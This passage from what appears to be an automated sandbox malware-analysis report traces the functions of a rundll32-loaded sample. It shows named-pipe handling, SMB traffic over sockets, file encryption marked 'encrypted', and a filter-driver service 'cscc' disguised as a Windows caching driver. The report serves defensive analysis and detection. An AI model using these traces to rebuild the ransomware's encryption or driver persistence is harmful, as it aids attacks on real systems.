                                                                      • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 0485709F
                                                                      • Sleep.KERNELBASE(000003E8), ref: 048570B3
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 048570C4
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048570C7
                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 048570E2
                                                                      • StrChrW.SHLWAPI(00000000,0000003A), ref: 048570F7
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04857114
                                                                      • HeapFree.KERNEL32(00000000), ref: 04857117
                                                                      • FlushFileBuffers.KERNEL32(?), ref: 04857120
                                                                      • DisconnectNamedPipe.KERNEL32(?), ref: 04857129
                                                                      • CloseHandle.KERNEL32(?), ref: 04857132
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                                      • String ID:
                                                                      • API String ID: 1225799970-0
                                                                      • Opcode ID: 61e88e7fca104c0b0ff20fb7e31bc66b52f2a5c69d109590005bd53ea408f518
                                                                      • Instruction ID: 28d9032a784f24b584c0ebeea1a8855a25c19dcbffcc60cd6bb575f2f6319381
                                                                      • Opcode Fuzzy Hash: 61e88e7fca104c0b0ff20fb7e31bc66b52f2a5c69d109590005bd53ea408f518
                                                                      • Instruction Fuzzy Hash: 24416271A40214BBDB217BA1DC49EAFBFBDEF45791F008914FD05E60A0D7789A40DAA1
                                                                      Function 04855BC4 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127fileencryptionmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04855E4C,?,?,00000000), ref: 04855BE3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04855C14
                                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C39
                                                                      • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C5D
                                                                      • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C75
                                                                      • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C8B
                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CA4
                                                                      • memcpy.MSVCRT(-00000004,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CB8
                                                                      • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04855E4C,?,?), ref: 04855CDC
                                                                      • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CE8
                                                                      • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CF1
                                                                      • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CFA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                                                      • String ID: encrypted
                                                                      • API String ID: 3326259677-1467498611
                                                                      • Opcode ID: 8244ba5d1199b06a09c1d1dc3bb6f140da0670ad3da7c0b57135447387fbd220
                                                                      • Instruction ID: f2da9084e3b159790d0ff52c106a94db3812280469ea3b4edb42876d56913646
                                                                      • Opcode Fuzzy Hash: 8244ba5d1199b06a09c1d1dc3bb6f140da0670ad3da7c0b57135447387fbd220
                                                                      • Instruction Fuzzy Hash: F841F7B1A00209BFDB01DF68DD88EAE7BF9FB44344F018525BD05E7250DB75AE148BA0
                                                                      Function 04851CA3 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 108memorynetworkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 299 4851ca3-4851ccd GetProcessHeap RtlAllocateHeap 300 4851dc7-4851dce 299->300 301 4851cd3-4851ce0 GetProcessHeap HeapAlloc 299->301 302 4851db5-4851dc1 GetProcessHeap HeapFree 301->302 303 4851ce6-4851d2e htons send 301->303 302->300 304 4851da5-4851daf GetProcessHeap HeapFree 303->304 305 4851d30-4851d45 recv 303->305 304->302 305->304 306 4851d47-4851d4a 305->306 306->304 307 4851d4c-4851d60 call 4851c3a 306->307 307->304 310 4851d62-4851d66 307->310 311 4851d6b 310->311 312 4851d6d-4851d8b call 4851747 311->312 312->304 315 4851d8d-4851d96 312->315 315->312 316 4851d98-4851da3 315->316 316->304 316->311
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04855414,00000000,?,0BADF00D,?,?,?,?,0485943A,?), ref: 04851CBD
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,0485943A,?), ref: 04851CC6
                                                                      • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,0485943A,?), ref: 04851CD7
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04851CDA
                                                                      • htons.WS2_32(0000002F), ref: 04851CF7
                                                                      • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04851D26
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04851D3D
                                                                        • Part of subcall function 04851747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04851C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04851783
                                                                        • Part of subcall function 04851747: HeapAlloc.KERNEL32(00000000), ref: 0485178C
                                                                        • Part of subcall function 04851747: CharUpperW.USER32(00000000), ref: 048517B2
                                                                        • Part of subcall function 04851747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 048517DA
                                                                        • Part of subcall function 04851747: HeapAlloc.KERNEL32(00000000), ref: 048517DD
                                                                        • Part of subcall function 04851747: htons.WS2_32(00000082), ref: 04851801
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A,?), ref: 04851DA8
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04851DAF
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0485943A,?), ref: 04851DBA
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04851DC1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Freehtons$AllocateCharUpperrecvsend
                                                                      • String ID: NT LM 0.12$x
                                                                      • API String ID: 30026595-3673895198
                                                                      • Opcode ID: 6829b181f746045b2574a3885c1e051bff71cd986f06fdfa0039e17c1f6596bb
                                                                      • Instruction ID: a2c96bfefd29edf453321afaf4770e159efe8a9806bd3ad9a97ddcf128ac400f
                                                                      • Opcode Fuzzy Hash: 6829b181f746045b2574a3885c1e051bff71cd986f06fdfa0039e17c1f6596bb
                                                                      • Instruction Fuzzy Hash: 9F319E32D00305BBEF129FE8DC48B9A7FB9EF45350F058855FE48AA1A1DB79A905CB50
                                                                      Function 04855D0A Relevance: 19.7, APIs: 13, Instructions: 152fileencryptionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 333 4855d0a-4855d32 CryptDuplicateKey 334 4855e98-4855e9c 333->334 335 4855d38-4855d52 CreateFileW 333->335 336 4855e7c-4855e88 CryptDestroyKey 335->336 337 4855d58-4855d76 GetFileSizeEx 335->337 336->334 338 4855e8a-4855e8d 336->338 339 4855da2-4855dc7 CreateFileMappingW 337->339 340 4855d78 337->340 338->334 343 4855e8f-4855e92 SetEvent 338->343 341 4855dcd-4855dea call 4855a73 339->341 342 4855e6e-4855e7a CloseHandle 339->342 344 4855d7e-4855d9f call 485a6b0 340->344 345 4855d7a-4855d7c 340->345 350 4855dec-4855df1 341->350 351 4855e4e 341->351 342->336 343->334 344->339 345->339 345->344 350->351 352 4855df3-4855e08 MapViewOfFile 350->352 353 4855e51-4855e5c CloseHandle 351->353 352->351 354 4855e0a-4855e24 CryptEncrypt 352->354 353->342 355 4855e5e-4855e69 call 4855a11 353->355 357 4855e26-4855e2c FlushViewOfFile 354->357 358 4855e32-4855e3d UnmapViewOfFile 354->358 355->342 357->358 358->353 359 4855e3f-4855e47 call 4855bc4 358->359 361 4855e4c 359->361 361->353
                                                                      APIs
                                                                      • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04855D2A
                                                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04855D46
                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 04855D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04855D8D
                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04855DBC
                                                                      • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04855DFD
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04855E1A
                                                                      • FlushViewOfFile.KERNEL32(?,?), ref: 04855E2C
                                                                      • UnmapViewOfFile.KERNEL32(?), ref: 04855E35
                                                                      • CloseHandle.KERNEL32(?,00000000,?,?,?,00000010,?), ref: 04855E54
                                                                      • CloseHandle.KERNEL32(?), ref: 04855E71
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 04855E7F
                                                                      • SetEvent.KERNEL32(?), ref: 04855E92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$CryptView$CloseCreateHandle$DestroyDuplicateEncryptEventFlushMappingSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 799083214-0
                                                                      • Opcode ID: c4057e4e5d3e47fc9c44a0fc791595d3e400d54cfbf63f4eca296a5f39f738ad
                                                                      • Instruction ID: 6badd6785b0af2a667d451fad2436385a9b606523455c8ef6e1da548c4b79269
                                                                      • Opcode Fuzzy Hash: c4057e4e5d3e47fc9c44a0fc791595d3e400d54cfbf63f4eca296a5f39f738ad
                                                                      • Instruction Fuzzy Hash: D8514972900219BBDF119FA5DC48AEFBFB9EF08750F048925FD05E2160D775AA40DBA0
                                                                      Function 04858313 Relevance: 19.6, APIs: 13, Instructions: 99memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 362 4858313-4858334 FindResourceW 363 4858415-485841a 362->363 364 485833a-4858349 LoadResource 362->364 364->363 365 485834f-485835b LockResource 364->365 365->363 366 4858361-4858373 SizeofResource 365->366 366->363 367 4858379-4858393 GetProcessHeap RtlAllocateHeap 366->367 368 4858395-48583a9 memcpy 367->368 369 4858413-4858414 367->369 370 48583b5-48583c5 GetProcessHeap RtlAllocateHeap 368->370 371 48583ab 368->371 369->363 373 4858407-485840d GetProcessHeap RtlFreeHeap 370->373 374 48583c7-48583dc call 485a790 370->374 372 48583ad-48583b1 371->372 372->372 375 48583b3 372->375 373->369 377 48583e1-48583e3 374->377 375->370 378 48583e5-48583ea 377->378 379 48583fa-4858401 GetProcessHeap HeapFree 377->379 380 48583f1-48583f8 378->380 381 48583ec-48583ef 378->381 379->373 380->373 381->380
                                                                      APIs
                                                                      • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0485832A
                                                                      • LoadResource.KERNEL32(00000000), ref: 04858341
                                                                      • LockResource.KERNEL32(00000000), ref: 04858350
                                                                      • SizeofResource.KERNEL32(00000000), ref: 04858368
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04858384
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0485838D
                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00000002), ref: 0485839C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 048583B9
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 048583BC
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 048583FE
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04858401
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0485840A
                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0485840D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                                                      • String ID:
                                                                      • API String ID: 3010137425-0
                                                                      • Opcode ID: 9c0b75511a2a569877ad42632365a3c59ae2ae61994c2e0cca8b91c48014fe88
                                                                      • Instruction ID: 87918ef810d0fbe8b343ace5540112642cbfbeb032f9b17d5795c0a3a3d7a6b7
                                                                      • Opcode Fuzzy Hash: 9c0b75511a2a569877ad42632365a3c59ae2ae61994c2e0cca8b91c48014fe88
                                                                      • Instruction Fuzzy Hash: C4315C71900205ABDB11AFA9DC48FAB7FACEF45355F008A15FD05D7290EB38E924CBA1
                                                                      Function 04855A73 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 132fileencryptionmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04855DE8,00000000,?,?,?,00000010,?), ref: 04855A92
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04855AC3
                                                                      • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855AEA
                                                                      • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B32
                                                                      • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B49
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B5F
                                                                      • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B77
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B99
                                                                      • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855BA2
                                                                      • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855BB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: encrypted
                                                                      • API String ID: 569730286-1467498611
                                                                      • Opcode ID: f569dc38f505cf0044b4b127df6f8f6b33419e26292d22d78b667400754c26f1
                                                                      • Instruction ID: 33e0427f761d271546ec03ad04c25227d045515c76ea724ead2798532028c285
                                                                      • Opcode Fuzzy Hash: f569dc38f505cf0044b4b127df6f8f6b33419e26292d22d78b667400754c26f1
                                                                      • Instruction Fuzzy Hash: 994150B2600209AFEB04DF74DC88AAA7BA9FB44354F058529FD05E7250DB75ED45CBA0
                                                                      Function 04851368 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 51serviceCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,0485154F,00000000,048511D0,?,?,?), ref: 04851377
                                                                      • GetLastError.KERNEL32(?,0485154F,00000000,048511D0,?,?,?), ref: 04851383
                                                                      • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,0485154F), ref: 048513B6
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0485154F,00000000,048511D0,?,?,?), ref: 048513DB
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0485154F,00000000,048511D0,?,?,?), ref: 048513DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                                                      • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                                                      • API String ID: 2226085316-2908389127
                                                                      • Opcode ID: 859a3bbbe9d11e4217626a866dbe1d245fe604a83e6b96e3d1225ad07c57eb37
                                                                      • Instruction ID: ed2b8db5f5306e84dd0b6fcb3eef22bca51b690f41186cfe47acdd6e7cf97ea9
                                                                      • Opcode Fuzzy Hash: 859a3bbbe9d11e4217626a866dbe1d245fe604a83e6b96e3d1225ad07c57eb37
                                                                      • Instruction Fuzzy Hash: 2501A731B82324BBC361ABA5AC4DD9F7E9CDB06BA1B000D51BD06E3600C5FC6900CEA4
                                                                      Function 04851531 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,048511D0,?,?,?), ref: 04851588
                                                                      Strings
                                                                      • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04851578
                                                                      • DumpFilters, xrefs: 04851592
                                                                      • cscc, xrefs: 0485153A
                                                                      • UpperFilters, xrefs: 04851573
                                                                      • cscc, xrefs: 04851533
                                                                      • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04851597
                                                                      • LowerFilters, xrefs: 0485155E
                                                                      • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04851563
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                                                      • API String ID: 1889659487-625840244
                                                                      • Opcode ID: 31f53beebec6da3b8be4eef901751fcf35c7ccce0985271ee3380550b9f3eb3b
                                                                      • Instruction ID: 89ca159c2e757f60d94bdcd0d2894ca32c4e1495675d20b87de936d3aa9f06d9
                                                                      • Opcode Fuzzy Hash: 31f53beebec6da3b8be4eef901751fcf35c7ccce0985271ee3380550b9f3eb3b
                                                                      • Instruction Fuzzy Hash: 29F08922FC1722171BF276ECA81DB5940815E02B5A7050F90EC43F7B21EEECFE408696
                                                                      Function 04856299 Relevance: 15.1, APIs: 10, Instructions: 81encryptionsynchronizationthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 048562A5
                                                                      • LocalFree.KERNEL32(?), ref: 0485635D
                                                                        • Part of subcall function 04855507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,048562C3,?), ref: 04855520
                                                                        • Part of subcall function 04855507: GetLastError.KERNEL32(?,048562C3,?), ref: 04855528
                                                                        • Part of subcall function 04855507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,048562C3,?), ref: 0485553E
                                                                      • CloseHandle.KERNEL32(?,?), ref: 04856348
                                                                        • Part of subcall function 04855613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855636
                                                                        • Part of subcall function 04855613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0485564C
                                                                        • Part of subcall function 04855613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855662
                                                                        • Part of subcall function 04855613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04855682
                                                                        • Part of subcall function 04855613: LocalAlloc.KERNEL32(00000040,?), ref: 0485568D
                                                                        • Part of subcall function 04855613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 048556A6
                                                                        • Part of subcall function 04855613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 048556B5
                                                                        • Part of subcall function 04855613: LocalFree.KERNEL32(00000000), ref: 048556BF
                                                                        • Part of subcall function 04855613: LocalFree.KERNEL32(?), ref: 048556C8
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 0485633F
                                                                        • Part of subcall function 04856085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560A6
                                                                        • Part of subcall function 04856085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560BA
                                                                        • Part of subcall function 04856085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,048562E0,?,?,?,?), ref: 048560D3
                                                                        • Part of subcall function 04856085: CryptDestroyHash.ADVAPI32(?,?,?,?,048562E0,?,?,?,?), ref: 048560DF
                                                                      • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04856336
                                                                        • Part of subcall function 04856246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856260
                                                                        • Part of subcall function 04856246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,048562E9,?,?,?,?), ref: 04856273
                                                                        • Part of subcall function 04856246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856289
                                                                      • CreateThread.KERNELBASE(00000000,00000000,048560F9,?,00000000,00000000), ref: 048562F7
                                                                        • Part of subcall function 04855E9F: PathCombineW.SHLWAPI(?,?,04861554,?,?), ref: 04855EC8
                                                                        • Part of subcall function 04855E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04855EE3
                                                                        • Part of subcall function 04855E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04855F09
                                                                        • Part of subcall function 04855E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04855FB1
                                                                        • Part of subcall function 04855E9F: StrStrIW.SHLWAPI(?,04863014), ref: 04855FE9
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04856312
                                                                      • CloseHandle.KERNEL32(00000000), ref: 04856319
                                                                      • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04856322
                                                                      • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 0485632D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
